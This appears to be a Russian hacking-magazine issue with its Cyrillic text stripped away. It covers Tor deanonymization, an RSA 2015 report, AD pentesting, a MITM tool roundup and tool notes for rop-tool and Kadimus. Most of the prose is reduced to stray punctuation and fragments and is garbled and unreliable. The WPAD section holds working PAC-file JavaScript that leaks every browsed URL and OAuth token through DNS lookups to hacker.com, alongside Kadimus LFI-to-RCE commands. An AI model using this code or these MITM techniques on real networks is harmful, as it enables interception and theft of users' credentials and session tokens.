https://www.schneier.com/blog/archives/2013/10/how_the_nsa_att.html,
www.theguardian.com/world/interactive/2013/oct/04/egotistical-giraffe-nsa-tor-document.
nSa
WARNING
- - . , - , -
.
Tor-.- -, . -Tor-,.
, -190,-Tor.-,.
Tor,,- , .exit--,,onion-.-onion-,HTTP/HTTPS- Tor-, -.
, HTTP-.-Referer,URL.- , --.
,-onion,.-,-,.
-,-.,.
,-,exit-,LeviathanSecurity.,-. - , Tor,-exit-nodeMITM--.
- , ( ) - , .
HTML5canvas,-JavaScript.-.-: (TorBrowser,-
);
-;
-.
,-, JavaScript- measu-reText().
,-TorBrowser,, . Tor Browser , --.
Tor-, , -
-
measureText() -
,
Tor
-
-
,
128
POST--, -,,.
? JS- -: Exit-node.MITM-,JS-
-,.
onion--,.,-.
XSS(,-)-.
. - 100 onion- ()falsepositive,,30%--.
, -, - . - , -JS--.,,c2c91d5b3c4fecd9109afe0esdfsdfsdfdrugs.onion(), gunsdfsdf.onion ( ),linkedin.com/vasya.:.
?-,onion-. , : JavaScript? , TorBrowser,JS.
, --.
- : - ( , - ), ( IT-). (ContentDeliveryNetwork,CDN),-128Tor-(CDN,).
, JavaScript,measureText()--.
-. -.
JavaScript,
fingerprint
-
, -
Tor Browser
,
Tor-
-
Tor-
, :
JavaScript -
? ,
Tor Browser,
JS
[Figure: onion site, exit node, XSS, doorway, inject, WWW diagram]
,-EMC-RSAConference2015,--CheckPoint.-,--,.-,:-,--.
RSA ConfeRenCe
IT-
2015
- , , , -
,. ,, . , - ? -???, 20 Moscone center,-, -RSA Conference 2015, -,--.
, - ,-.- -. - .-:, ( ,,-),,,.
,--. , -. - RSA, - ,,,, , ,,,-.
. Microsoft , , ,
,,,--,,-..
, , -.(-),-,, . - -.-,:-...
( !) (-).
- . - , Symantec TrendMicro Cisco Fortinet (-, - ), , , ,-.,,-.
(keynotes,,,, ),-. ( ), ( ) - --. -, (!),-.:,-,.
1.Dr.APT, ( Android), ( CAIQ,),-,.,-keynotes., -.
,-NFC (GoogleWalletApplePay)--,,:-.
:goo.gl/yf1TXL
,.62!- : 48% --,40%. , -(!). Improperly Validated SSL -,.,-, ,.
:goo.gl/ft1e3L
,2014,(-?:https://xakep.ru/2015/04/09/195-exploit-packs/), . MS Office ,CVE-2012-0158!
:goo.gl/1Nb6lN
-Yes,IaminRU, , . , (517) , .,,,() , - . (), ,,,-,-:,, , -.,-,.-, - BBS. ,BBS-, . (--),,-,65%814.
!
SAPASE,? SQL/RPC- .-Java.
:goo.gl/b5eDZu
(https://xakep.ru/2014/09/08/password-manager-pentest/).,,(ZhiweiLi).-.,-.:CSRF(LastPass,RoboForm,NeedMyPassword)XSS(NeedMyPassword).
:goo.gl/H4TM2q
,
, will
hack for food
,
-
,
-
. ,
-
, , ,-.-IT-,:).
,-,RC2,RC4,RC5,.RSA.-,-.
, , RSA.
, - --,,.- .
. , - Windows, Microsoft. - - Microsoft Windows, SysinternalsProcessExplorerRootkitRevealer.,:https://xakep.ru/2009/05/12/48169/.
, Blowfish, -.SchneieronSecurity:DataandGoliath,-.
2. Moscone- . full pass, -, , , 2100 ,., ,-.(-).
.,,-. , ,--.
,-(!), . , :, . . -, . , ,,, 70% -.
IoT (Internet of Things) CCTV- -RomPager,-
INFO
- - Wi-Fi, . - , ,
Wireshark,
,
:).
-2012., , (https://xakep.ru/2012/12/30/kris-kasperski/), . , (,-,,,:).. .).
McAfee. , , ,McAfee,,,-:).
-.
!, (),-SpartanRifleLWRC,. -(),.
CheckPoint,-(;)),.,!
, 70%
, .
(POS) , . , - , PHP-,(), , .:,,.-,...
()-. . -:201337%,,201545%.-.5%,,-.,..-,.IT.
, . . ,,.
, ,,,,.
,( ). (top-ratedspeaker), . , . - SysinternalsTools, ,.-,2009-ProcessExplorer(,proofofconcept,).(- , - , , . , ).,--2012(blogs.technet.com/b/markrussinovich/archive/2012/01/05/3473797.aspx) RSA 2015-.-,,(), -.,ProcMon, ProcMon -,XML-,.-/.
.,-Kill,-. . ,.- suspend. , -.,--.Kill.,Windows10,,,.
, . ,, - . - , , -., , .
INFO
216
4.
-
,
,
Asus Eee
PC 1001px. -
-
... , -
windows XP!
, 2009 Process Explorer
. - , -, . , , , - . , . , , . , .
-, - - . , , , , , .
() - , -. - . - - - , .
(Active Directory, Lotus Domino, LDAP, Novell ).
(penetration testing) - . - , - , - . - , , , .
,
- , . . . , , - . - , - , 60 .
. - - , (, Active Directory). - -. - , . , , -, SNMP, RW. -, Oracle !
, .
. ,
white hat, , - -, ,
X@ygoltsev
Intro - , . , , , -, , . ( ) : , , . , - , . , Offensive Security -
, , - .
-, , . - - . , - Active Directory, , , - . , ( AES), , , - (j.mp/NCrOZU). , , - .
Active Directory, Windows.
- . , - .
WIndoWs Windows - Active Directory. - , , (, SMB Relay) (, mimikatz). , Domain Admins .
Windows.
- , - , . . , .
Web Proxy Auto dIscovery Internet Explorer. , , , - wpad.domain.name. . WPAD .
WPAD DNS, , , , .
NBNS WPAD.
, , http://wpad/wpad.dat.
, - -. wpad.domain.name, , , , WPAD NBNS . MITM , , ARP Poisoning.
Windows.
, - ( WPAD). Active Directory. -: User configuration Windows Settings Internet Explorer Maintenance Connection Automatic Browser Configuration Automatically detect configuration setting. .
/ , - , - , Hack.Tool. . .
Windows.
- -, - .
, . , , . , - , . . , . , , - - , - .
.
-. , - , . IP-, . , - .
-. .
Windows UNIx.
. - , . , - .
outro , , - , . - - , - . -, .
Vulnerability Assessment
(bit.ly/17lVCDU) Open Source Security Testing
Methodology Manual (bit.ly/U9WpQY) The Penetration Testing Execution
Standard (bit.ly/1KNe7iF)
PentesterLab (bit.ly/1uJ3RUu) Penetration Testing Practice Lab
(bit.ly/1fb61kO)
Open Penetration Testing Bookmarks
Collection (bit.ly/1vncteH)
, Active Directory (bit.ly/1cezrBb)
WPAD Man in the Middle (bit.ly/1InN9OL)
MITMf(goo.gl/LdxWWY) . - man-in-the-middle , sergio-proxy. Kali Linux. - (goo.gl/LdxWWY) :
# setup.sh
# pip install -r requirements.txt
. : Spoof -
ARP/DHCP-, ICMP-;
Sniffer - ;
BeEFAutorun BeEF, ;
AppCachePoison ;
SessionHijacking - ;
BrowserProfiler ;
FilePwn HTTP - Backdoor Factory BDFProxy;
Inject HTML-; jskeylogger JavaScript- .
, , .
-. .
, - , . -
. -,
, MITM-.
MITM-
ant [email protected], @svv00p
ARP spoofing MITMf
WARNING
- - . , - , -
.
PuttyRider
PuttyRider
PuTTyRIdeR (goo.gl/xZpsbV) . , - -, -. , , - - Linux/UNIX-, SSH/Telnet/rlogin. - , . , PuTTY - . ( ), shell- . (). , - PuTTY, - (goo.gl/5MQdzW).
Sessionthief
sessIonThIef (goo.gl/VP51xA) , . . - ( - ) ARP poisoning. - , , , , Yahoo Facebook, SSL-, . , - , SSL, - . , Firefox - . - , :
# apt-get install build-essential libwxgtk2.8-dev libgtk2.0-dev libpcap-dev
# g++ $(wx-config --cppflags --libs) -lpcap -o sessionthief *.cpp
# setcap cap_net_raw,cap_net_admin=eip sessionthief
dsnIff(goo.gl/umyYJW)Dsniff , , - , , , : -/, . : arpspoof , ; dnsspoof arpspoof DNS-
DNS- ; dsniff (password sniffer), -
, Telnet, FTP, SMTP, POP (Post Office Protocol), IMAP (Internet Message Access Protocol), HTTP, CVS, Citrix, SMB (Server Message Block), Oracle ;
filesnarf tcpdump NFS-;
macof MAC- , , -, , dsniff ;
sshmitm SSH-, , .
. , . , -, -. Dsniff
MITMPRoxy(goo.gl/ISdbbM) , - HTTP-. /, -, , , -. , - . mitmproxy REST API, .
:
$ sudo aptitude install mitmproxy
$ pip install mitmproxy
$ easy_install mitmproxy
, mitmproxy HTTPS-, . , , - : goo.gl/FLcaiS.
Intercepter-NG
InTeRcePTeR-nG(goo.gl/r9n2jz) , . , ( - ) - . -, MITM, -, . - . -, , . -, - , , nix- - (, , Wine GUI). - MITM. . ARP poison. ( DNS/NBNS/LLMNR). DNS over ICMP Redirect, ICMP Redirect. DHCP MITM, SSL MITM + SSLStrip, WPAD, HTTP Injection, SSH-MITM. , - Windows , MITM (SSLStrip, SSL MITM, SMB hijack, LDAP relay, HTTP injection) . . , , .
Mitmproxy
PRoxyfuzz (goo.gl/C9B0AY) MITM- ProzyFuzz - . , - . , , - . TCP UDP. , . , -- ( ) PoC. :
python proxyfuzz -l -r -p [options]
: w ,
; c ( ); s ( ); u UDP- ( TCP).
The MIddleR(goo.gl/Gf3AlT) DEF CON - MITM- . - - HTTP : plugin-beef.py Browser Exploitation Framework (BeEF)
HTTP-, ; plugin-metasploit.py (HTTP)
IFRAME, Metasploit;
plugin-keylogger.py JavaScript onKeyPress , - HTTPS, , .
The Middler , - , . - - ( ), . : scapy, libpcap, readline, libdnet, python-netfilter. , , - .
eTTeRcaP(goo.gl/DF9xJ4) , - , MITM-. - , , - . - , - - . ][, : goo.gl/0CpUko.
Subterfuge
subTeRfuGe(goo.gl/0VKemE) Windows - MITM-, Intercepter-NG: , . , - Windows Linux MITM- (SSLStrip, SSL MITM, SMB hijack, LDAP relay, HTTP injection). nix- . MITM - (, Ettercap, Arpspoof, SSLStrip), . Subterfuge, , , DEF CON 20. , : SubterfugePublicBeta5.0.tar.gz. -
tar -zxvf /root/Desktop/SubterfugePublicBeta5.0.tar.gz -C /root/Desktop
cd /root/Desktop/subterfuge
python install.py
, . , -, subterfuge, - 127.0.0.1. Start , Subterfuge , . , Settings. , -: Session Hijacking: ,
-; HTTP code injection: -
; Evilgrade: Evilgrade -
.
KaRMa (goo.gl/mEIHc3) , - . , KARMA , , -, 802.11 Probe Request , / . Evil Twin, MITM. - , -, -, , . , , , -, , AP, - . : , , - ? , - , . -, , WiFi Pineapple Mark IV. KARMA -: Pwnie Express, Kali Linux, Snoopy, Jasager.
aIRJacK(goo.gl/TM9niF) , , ( , ) 802.11 . - . , , AirJack , ( DoS- MITM-), - SSID .
Ettercap
Lenovo. Superfish, - -. , SSL- - . , Superfish Inc. - Superfish : MITM;
(SHA-1, 1024- RSA) ; ; -
; -; .
, - MITM-. , - .
SuperfiSh
In The end , , -, , , , - . , - MITM- , , - , . nix- . , , credentials. , :).
WPAD--.,,,-,-HTTPS-.
WPAD WPAD
@cdump, [email protected]
PAC-,URL,-,.:
function FindProxyForURL(url, host) {
  if (host == "xakep.ru") {
    return "PROXY proxy.com:8080";
  } else if (host == "microsoft.com") {
    return "PROXY anotherproxy.com:5050";
  } else {
    return "DIRECT";
  }
}
FindProxyForURL, PAC- - . , , -, -google.com proxy1.com, proxy2.com,- , --.
PAC-- - , Firefox - URL. - . -WPAD.
WPAD WPAD PAC- DHCP- ( ), HTTP- http://wpad.%domain%/wpad.dat. - wpad.dat -.
, DHCP,msk.office.work. WindowsXPwpad.msk.office.work ( -
WPAD(WebProxyAutoDiscoveryprotocol),-PAC(ProxyAutoConfig),JavaScript,-, URL. FindProxyForURL
. 1. , -
Windows XP
. 2. , -
Windows 7
WARNING
- - . , - , -
.
DNS),wpad.office.work. http://wpad.msk.office.work/wpad.dat(DNS) http://wpad.office.work/wpad.dat(DNS)
Windows7-:DNS- , WPADLink-Local Multicast Name Resolution,-NetBIOS Name Service.- , WindowsVista. http://wpad.msk.office.work/wpad.dat(DNS) http://wpad/wpad.dat(LLMNR) http://wpad/wpad.dat(NBNS)
-, -. -NetBIOS,-NBNS-Metasploit(.3).
-,WINS-, Windows-WPAD,-WINS-.-: ,, /24, -IP.
861 . .com,.net,.ru,.org,-
.work.school.ninja.vodka.-domain-nameDHCP-.,domain-name .school-wpad.school,WPAD-.,wpad.TLD,(.4).
wpad.co, --wpad.dat. , : wpad.work. -3901IP.
Profit?,- -. ? HTTP-:-,,cookies,.
HTTPSCONNECT.-user-agent.-, , handshake,-.
BAcktoPAc PAC-JavaScript, window,document,
. 3. NBNS-
. 4.
-
WPAD
. 5. -
wpad.work:
. 6. HTTP- -
-
, -: Chrome , , (GET-), Firefox (location.hash). , URLhttp://mail.ru/?a=123#token=secret(..910).
,-,- URL. , isResolvable, URL. URL , -,d.wpad.work,NS-DNS-,-.
,-:
function encode(str) {
  // every character outside [a-z1-9] becomes "0" + its char code
  // (0 itself is encoded too, so it can serve as the escape prefix)
  var r = str.toLowerCase()
    .replace(/([^a-z1-9])/g, function(m) {
      return "0" + m.charCodeAt(0);
    })
    // split into DNS labels of at most 60 characters, cap total length
    .replace(/([^\.]{60})(.)/g, '$1.$2')
    .substr(0, 240);
  return r + (r.slice(-1) != "." ? "." : "") + "hacker.com";
}
function FindProxyForURL(url, host) {
  var u = encode(url);
  // the DNS lookup itself is the point; the result does not matter
  return isResolvable(u) ? "DIRECT" : "DIRECT";
}
URLhttps://example.ru/?token=123- https058047047example046ru047063token061123.hacker.com,,-Perl:
echo 'https058047047example046ru047063token061123.hacker.com' \
  | perl -lape 's/\.hacker\.com$//; s/\.//g; s/0(..)/chr($1)/eg;'
,URL(location.hash)-OAuth-. , -Firefox.
WPAD , HTTPS, -,OAuthURL.,-wpad.LTD.
, , , WPAD.,-: .
.local,,-broadcast-,,Bonjour.-,.
wpad. -
(IEChrome).
alert (-)..
isResolvable,-IP-.:
if (isResolvable(host)) return "PROXY proxy.com:8080";
? , , FindProxyForURLURL.-
. 7. HTTPS-
-
. 8. JavaScript-
,
PAC-
. 9.
FindProxyForURL
Chrome
. 10.
FindProxyForURL
Firefox
Dylib Hijack Scanner DLL hijack Windows, , . : , - DLL- DLL (Microsoft Security Advisory 2269637). , Mac, dylib-. - : LC_LOAD_WEAK_DYLIB; @RPATHS; LC_LOAD_DYLIB + LC_RPATH.
, , - - , - , , .
Dylib hijack scanner (DHS) , - , dylib hijacking .
- Mac, iCloud Photos, Xcode, Word, Excel, Dropbox .
- DLL Hijacking on OS X? #@%& Yeah! (ht tps://s3.amazonaws.com/s3.synack.com/canSecW.pdf) CanSecWest 2015.
rop-toolRop-tool , . - , - .
: gadget ROP-; patch -
; info
; search
.
: , , ; ; Intel AT&T ; ELF, PE MACH-O; big little endian; x86 x86_64.
- Capstone.
:
# rop-tool g ./program
# rop-tool s ./program -s "/bin/sh"
# rop-tool s ./program -a
# 0x1000 \xaa\xbb\xcc\xdd patched
# rop-tool p ./program -o 0x1000 -b "\xaa\xbb\xcc\xdd" -O patched
lFi Kadimus LFI (Local File Inclusion) - .
: URL-; /var/log/auth.log RCE; /proc/self/environ RCE; php://input RCE; data://text RCE; ; ; shell- HTTP-
; (socks4://, socks4a://,
socks5://, socks5h:// http://); socks5 bind connections.
:
./kadimus -U url_list.txt --threads 10 --connect-timeout 10 --retry-times 0
:
./kadimus -t localhost/?pg=contact -G -f "index.php%00" -O local_output.php --inject-at pg
PHP-:
./kadimus -t localhost/?pg=php://input%00 -C '' -X input
RFI (Remote File Inclusion) .
X-toolS
D1g1 Digital Security
@evdokimovds
: Patrick Wardle: MacURL: https://objective-see.com/products/dhs.html
: t00sh: LinuxURL: https://github.com/t00sh/rop-tool
: P0cL4bs Team: LinuxURL: https://github.com/P0cL4bs/Kadimus
WARNING
! - ! , - !
victimS verSion SearcH Java- , - - . , .
Victims-version-search Python-, - JAR-. - victims-cve-db (https://github.com/victims/victims-cve-db). - , - .
- :
1. Maven manifest (pom.xml), - .
2. artifactId.
3. META-INF/MANIFEST.MF artifactId.
: Python 2.6+; PyYAML; SQLite 3; victims-cve-db .
- .